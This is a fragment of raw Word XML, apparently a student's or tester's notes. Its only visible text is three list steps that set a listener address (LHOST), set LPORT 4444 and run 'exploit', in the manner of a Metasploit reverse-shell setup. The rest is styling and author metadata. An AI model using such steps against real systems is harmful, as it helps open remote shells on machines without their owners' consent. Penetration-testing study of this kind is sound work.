    <w:p w14:paraId="34E27FEC" w14:textId="761A941D" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set LHOSTS ip address (my ip address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3008CE2E" w14:textId="2452495B" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9FFE49" w14:textId="2CA76512" w:rsidR="006E13D9" w:rsidRPr="00C61142" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006E13D9" w:rsidRPr="00C6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35CFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6F41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624A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CC8B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E6547"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D896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B34CC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CC8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A6F1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35627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234C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F50E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413C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BCBE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A4F76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="916A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D32E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CC8B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53803424">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2009868582">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="591360622">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1238784667">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1618681791">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="757949325">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2035958662">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="25302195">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1089691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42"/>
    <w:rsid w:val="000B679F"/>
    <w:rsid w:val="0035297A"/>
    <w:rsid w:val="003D5547"/>
    <w:rsid w:val="004B542E"/>
    <w:rsid w:val="00515EC0"/>
    <w:rsid w:val="006C192B"/>
    <w:rsid w:val="006E13D9"/>
    <w:rsid w:val="008C6FA2"/>
    <w:rsid w:val="0091656D"/>
    <w:rsid w:val="00A62839"/>
    <w:rsid w:val="00C61142"/>
    <w:rsid w:val="00D52375"/>
    <w:rsid w:val="00E66319"/>
    <w:rsid w:val="00ED0A30"/>
    <w:rsid w:val="00FC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FF6B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B7545C40-DA4F-4E60-A8F2-9BFE910D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11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1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11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11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1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11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11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11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11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1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42"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00C61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42"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00C61142"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C61142"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00C61142"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00C611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1142"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00C611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DHIKRULAHI FAKAYODE</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>DHIKRULAHI FAKAYODE</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-02T22:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-03T01:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>